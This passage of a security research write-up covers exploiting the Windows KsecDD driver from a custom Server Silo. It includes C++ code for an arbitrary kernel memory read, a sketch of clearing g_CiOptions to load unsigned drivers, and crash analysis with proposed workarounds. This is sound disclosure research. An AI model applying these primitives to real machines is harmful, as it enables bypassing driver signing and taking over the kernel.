We implemented this idea, and extended our initial proof-of-concept so that it uses this gadget to read 8 bytes of kernel memory, at an arbitrary address.

```cpp
BOOL KsecDD::KernelRead64(LONG_PTR Addr, PUINT64 Value) {
    FUNCTION_RETURN fr = { 0 };
    SET_FUNCTION_RETURN_REQ req = { 0 };

    // Set the target function address (RAX) to the address of the "read" gadget in the kernel.
    fr.Function = (PVOID)(m_pKernelBaseAddr + m_lReadGadgetOffset);
    fr.Argument = (PVOID)(Addr - 0x10); // RCX, accounts for 'RCX+0x10' in the gadget
    req.FunctionReturn = &fr;
    req.Value = 0;                      // EDX value not used here

    if (!this->DeviceIoControl(IOCTL_KSEC_IPC_SET_FUNCTION_RETURN, &req, sizeof(req), NULL, 0))
        return FALSE;

    // The gadget wrote the 8 bytes read at Addr to R8, i.e. over the first field of 'req'.
    *Value = (UINT64)req.FunctionReturn;
    return TRUE;
}
```

And it worked like a charm! In this particular instance, reading ci!g_CiOptions returned the typical value 0x00000006.
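With both a read and a write primitive, the approach discussed earlier for ci!g_CiOptions becomes: save the original value, clear it, load the driver, then restore the saved value to keep the window in which PatchGuard could notice the change as short as possible. The C sketch below only illustrates that ordering. kernel_read64, kernel_write32 and load_unsigned_driver are hypothetical helpers operating on a simulated memory buffer; in a real PoC they would wrap the SET_FUNCTION_RETURN IOCTL and the driver-loading step. We also assume that g_CiOptions is a 32-bit variable on a little-endian (x64) system.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

/* Simulated memory standing in for kernel space (illustration only). */
static uint8_t g_fake_memory[64];
static bool g_load_succeeds = true;

static bool kernel_read64(uint64_t addr, uint64_t *value) {
    if (addr > sizeof(g_fake_memory) - sizeof(*value)) return false;
    memcpy(value, g_fake_memory + addr, sizeof(*value));
    return true;
}

static bool kernel_write32(uint64_t addr, uint32_t value) {
    if (addr > sizeof(g_fake_memory) - sizeof(value)) return false;
    memcpy(g_fake_memory + addr, &value, sizeof(value));
    return true;
}

static bool load_unsigned_driver(void) { return g_load_succeeds; } /* hypothetical */

/* Clears g_CiOptions only for the duration of the driver load, then restores it. */
static bool load_with_ci_options_cleared(uint64_t ci_options_addr) {
    uint64_t raw;
    if (!kernel_read64(ci_options_addr, &raw))
        return false;
    uint32_t saved = (uint32_t)raw; /* low 32 bits = first 4 bytes on little-endian */
    if (!kernel_write32(ci_options_addr, 0))
        return false;
    bool loaded = load_unsigned_driver();
    bool restored = kernel_write32(ci_options_addr, saved); /* restore even if loading failed */
    return loaded && restored;
}
```

Restoring the exact value read beforehand, rather than a hard-coded 0x00000006, is what makes the read primitive necessary when the original value is, for instance, 0x00004006.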

To Infinity and… Kernel Crash

Proudly equipped with our new capability, we proceeded to further extend our proof-of-concept. Being able to read and write arbitrary memory in kernel space indeed unlocks a myriad of possibilities, such as manipulating protected processes, or even patching DSE when Virtualization Based Security is enabled. But we soon realized that there was a pernicious problem we had failed to identify sooner.

On some occasions, executing our PoC resulted in a system crash. We didn’t pay attention to it initially because it could have been the result of an address or offset being incorrectly calculated, or a faulty gadget. But then, starting from a clean machine state, we began to observe a clear recurring pattern. The system crash systematically occurred at the 5th execution of the PoC. Time for kernel debugging once again!



Using the command !analyze -v, recommended by WinDbg, we observed the following error.



Apparently, the crash stems from an attempt to free a pool allocation at an invalid address. We can get more information about this address with the command !address 0000002222b9f9e0.



WinDbg informs us that this address is not a pool address, but is in a “user range”, which explains the error. We can see what is stored at this memory location with the command dq 0000002222b9f9e0, and we immediately notice the value 0x00000006, which is the value of g_CiOptions we obtained thanks to our gadget. So, the faulty address is likely related to our user-supplied buffer.



To understand what caused this invalid memory access, we can start by getting the backtrace with the command k.

From this backtrace, we learn that the “bug check” was triggered by nt!ExFreePoolWithTag. This call originated from nt!ExFreeToLookasideListEx, which appears to be invoked as soon as our user-supplied function call is complete.

Below is the pseudo-code of the function ksecdd!CallInProgressCompleted. We can see that the function nt!ExFreeToLookasideListEx is indeed systematically called after the execution of the user-supplied function. So, why does the crash only occur at the 5th attempt, and not right away?

```c
// ksecdd.sys 10.0.22621.3810
NTSTATUS CallInProgressCompleted(KSEC_SET_FUNCTION_RETURN_REQ *req, KSEC_SET_FUNCTION_RETURN_REQ *req2, DWORD size) {
    KSEC_FUNCTION_RETURN *params;
    params = req->params;
    if (params != NULL) {
        (*(code *)params->Function)(params->Argument, req->Value, req2, size, params->unk);
        ExFreeToLookasideListEx(&g_CallQueue, params);
    }
    return STATUS_SUCCESS;
}
```

To answer this question, we need to learn more about lookaside lists. According to the documentation, “A lookaside list is a pool of fixed-size buffers that the driver can manage locally to reduce the number of calls to system allocation routines and, thereby, to improve performance”.

Hmm…, all things considered, we’ll take a look at the code of nt!ExFreeToLookasideListEx instead.

```c
// ntoskrnl.exe 10.0.22621.4169
void ExFreeToLookasideListEx(PLOOKASIDE_LIST_EX Lookaside, PVOID Entry) {
    Lookaside->TotalFrees += 1;

    // Number of entries currently held by the list (Depth field of its SLIST_HEADER)
    if (*(ushort *)&Lookaside->Alignment < Lookaside->Depth) {                         // [1]
        ExpInterlockedPushEntrySList((PSLIST_HEADER)Lookaside, (PSLIST_ENTRY)Entry); // [2]
        return;                                                                      // [2]
    }

    Lookaside->FreeMisses = Lookaside->FreeMisses + 1;
    (*Lookaside->FreeEx)(Entry); // nt!SmFreeWrapper                                  // [3]
    return;
}
```

After cleaning up the pseudo-code, the origin of the bug becomes clear. First, a condition compares the number of entries currently stored in the list with its “depth” (1). If the list is not full, the input object is pushed to the list, and the function returns (2). Otherwise, the FreeEx member function, i.e. nt!SmFreeWrapper in this case, is invoked to free the input object (3).
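The decision logic above can be reproduced in user mode. The following C sketch is a simplified model, not the kernel's implementation: lookaside_model, its fields, free_to_lookaside and counting_free are hypothetical names, the SLIST_HEADER is replaced by a plain array plus a counter, and FreeEx is whatever callback we plug in.

```c
#include <assert.h>
#include <stdint.h>

#define MAX_ENTRIES 256

/* Hypothetical, simplified stand-in for LOOKASIDE_LIST_EX. */
typedef struct lookaside_model {
    void *entries[MAX_ENTRIES];  /* replaces the SLIST of cached entries  */
    uint16_t count;              /* entries currently cached (SLIST depth) */
    uint16_t Depth;              /* maximum number of cached entries       */
    uint32_t TotalFrees;
    uint32_t FreeMisses;
    void (*FreeEx)(void *entry); /* invoked only when the list is full    */
} lookaside_model;

/* Same decision as the decompiled ExFreeToLookasideListEx. */
static void free_to_lookaside(lookaside_model *l, void *entry) {
    l->TotalFrees += 1;
    if (l->count < l->Depth) {          /* [1] list not full yet       */
        assert(l->count < MAX_ENTRIES);
        l->entries[l->count++] = entry; /* [2] cache it, nothing freed */
        return;
    }
    l->FreeMisses += 1;
    l->FreeEx(entry);                   /* [3] nt!SmFreeWrapper in the kernel */
}

/* Demo FreeEx callback: records how often, and with what, it was called. */
static unsigned free_calls;
static void *last_freed;
static void counting_free(void *entry) {
    free_calls++;
    last_freed = entry;
}
```

With Depth set to 4 and FreeEx set to counting_free, the first four calls to free_to_lookaside are absorbed by the list, and the fifth one is the first to reach FreeEx.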

By now, you have probably guessed what this depth value is, but let’s confirm it by pushing the reverse engineering a bit further. We can do this either dynamically or statically. For the sake of completeness, we opted for the static approach.



We know that a lookaside list must be initialized by calling nt!ExInitializeLookasideListEx, whose last argument is Depth. However, according to the documentation, this parameter is reserved and must be set to 0. A quick look at the code in Ghidra confirms that the driver does pass 0.

This means that the actual value must be set by the Windows kernel itself. After analyzing the function nt!ExInitializeLookasideListEx, we eventually observed that the Depth attribute of the list is set to the value of nt!ExMinimumLookasideDepth, i.e. 0x0004.

Here we have the full picture! Each time we invoke the IOCTL SET_FUNCTION_RETURN with a user-supplied buffer, its pointer is pushed to a list of objects that are supposed to be allocated in a kernel pool. Since the depth of this list is 4, the list is full after the first 4 attempts. At the 5th attempt, the supplied object is therefore freed instead, which causes a crash because its address is in the “user range” rather than in a kernel pool.
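The whole sequence can be simulated end to end. In this C sketch, set_function_return is a hypothetical user-mode stand-in for the IOCTL path (call the supplied function, then release the parameter block to the list), and pool_free plays the role of nt!SmFreeWrapper by flagging a “crash” whenever it receives a buffer that was not allocated from a pool. init_call_queue mirrors what we observed: the Depth argument is reserved (0) and the kernel substitutes ExMinimumLookasideDepth. As a simplifying assumption of the model, nothing is ever allocated back from the list.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

#define EX_MINIMUM_LOOKASIDE_DEPTH 4 /* value of nt!ExMinimumLookasideDepth */

typedef struct params_block {
    void (*Function)(void *arg);
    void *Argument;
    bool from_pool;          /* false: the buffer lives in the user range */
} params_block;

typedef struct call_queue {
    unsigned count, depth;
    bool crashed;            /* set when a non-pool buffer reaches the free routine */
} call_queue;

/* The Depth argument is reserved and must be 0; the kernel picks the value. */
static void init_call_queue(call_queue *q, unsigned reserved_depth) {
    assert(reserved_depth == 0);
    q->count = 0;
    q->depth = EX_MINIMUM_LOOKASIDE_DEPTH;
    q->crashed = false;
}

/* Stand-in for nt!SmFreeWrapper -> nt!ExFreePoolWithTag. */
static void pool_free(call_queue *q, params_block *p) {
    if (!p->from_pool)
        q->crashed = true;   /* a real kernel would bug check here */
}

/* Hypothetical model of one SET_FUNCTION_RETURN request. */
static void set_function_return(call_queue *q, params_block *p) {
    p->Function(p->Argument);  /* simplified: the real call passes more arguments */
    if (q->count < q->depth)
        q->count++;            /* pointer cached in the list */
    else
        pool_free(q, p);       /* list full: pointer is freed */
}

static void noop(void *arg) { (void)arg; }

/* Returns the 1-based attempt that crashes, or 0 if none of 'attempts' does. */
static unsigned first_crashing_attempt(unsigned attempts) {
    call_queue q;
    init_call_queue(&q, 0);
    params_block user_buf = { noop, NULL, false };
    for (unsigned i = 1; i <= attempts; i++) {
        set_function_return(&q, &user_buf);
        if (q.crashed)
            return i;
    }
    return 0;
}
```

In this model, first_crashing_attempt(4) returns 0, while any run of 5 or more requests crashes at attempt 5, matching the behavior we observed.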

The problem is clear, and at first sight there appears to be nothing we can do about it. After thinking about it, though, we came up with 2 potential solutions. The first one relies on the fact that the free function is called only when the list is full: we could use our memory write primitive to reset the list’s internal counter each time we run the exploit. This way, the counter would always stay lower than the list’s depth, and the free function would never be called. The second option is to overwrite the FreeEx attribute of the list object directly, so that it points to a ret instruction, for instance. The main benefit of this method is that it needs to be done only once.
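Both ideas can be checked against a toy model. In the C sketch below, which does not use any real kernel structure, the reset_counter flag models the first workaround (zeroing the list’s entry count with a write primitive before every request) and the patch_free_ex flag models the second (pointing FreeEx at a function that returns immediately, like a ret gadget). All names are hypothetical; the point is only to show why either change keeps the free routine away from our user-mode buffers.

```c
#include <assert.h>
#include <stdbool.h>

#define DEPTH 4 /* nt!ExMinimumLookasideDepth */

typedef struct toy_list {
    unsigned count;                     /* entries currently cached       */
    void (*free_ex)(struct toy_list *); /* called when the list is full  */
    bool crashed;
} toy_list;

/* Original behavior: freeing a user-range buffer crashes the system. */
static void crashing_free(toy_list *l) { l->crashed = true; }

/* Workaround 2: FreeEx redirected to a function that returns immediately. */
static void ret_gadget(toy_list *l) { (void)l; }

/* One SET_FUNCTION_RETURN request releasing a user-mode buffer. */
static void release_user_buffer(toy_list *l) {
    if (l->count < DEPTH)
        l->count++;
    else
        l->free_ex(l);
}

/* Runs 'requests' requests; returns true if none of them crashed. */
static bool survives(unsigned requests, bool reset_counter, bool patch_free_ex) {
    toy_list l = { 0, crashing_free, false };
    if (patch_free_ex)
        l.free_ex = ret_gadget;  /* workaround 2: done once, up front */
    for (unsigned i = 0; i < requests; i++) {
        if (reset_counter)
            l.count = 0;         /* workaround 1: done before every request */
        release_user_buffer(&l);
        if (l.crashed)
            return false;
    }
    return true;
}
```

The trade-off described above shows up directly: the counter reset must be repeated before every request, whereas the FreeEx patch is a one-time write. The model conveniently sidesteps the hard part, though, which is finding the list object in the first place.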

From an exploit development standpoint, though, the downside is that, in both cases, we have to locate the list object dynamically, at runtime. This is technically feasible, but it is a pain to deal with the cross-references and with the implementation differences between Windows versions. So, we decided not to go down this route.

Unfortunately, this limitation put a brake on our research because, without the ability to leverage the SET_FUNCTION_RETURN IOCTL more than 4 times, it is impractical to implement more sophisticated exploits.

Conclusion

First and foremost, we want to thank @floesen_ for sharing their work on the KsecDD driver, and also for leaving a door open for further expanding their research with this mention about Server Silos. This sparked our curiosity and interest, and was the starting point of this project.

In conclusion, we can state that the use of the KsecDD driver is not limited to LSASS. We were able to confirm the author’s observation that only one connection to the driver is allowed per Server Silo. From there, we demonstrated that, by manually creating our own Server Silo, it was possible to overcome this limitation without interacting with LSASS at all, which means that this technique would work even if LSA Protection was enabled.

However, we also outlined another strong limitation of the exploit: it can only be run four times before triggering a kernel crash. So, it’s now our turn to open a door for improving the technique. We already laid out some ideas as to how this limitation could be worked around, but there might be another avenue yet to be explored. While inspecting the IOCTLs exposed by the driver, we saw that it offered capabilities to allocate pool memory and copy memory, so there is a chance those can be leveraged to create the appropriate structures directly in kernel space and thus avoid the crash. To be continued?…

A proof-of-concept is available here: https://github.com/scrt/KexecDDPlus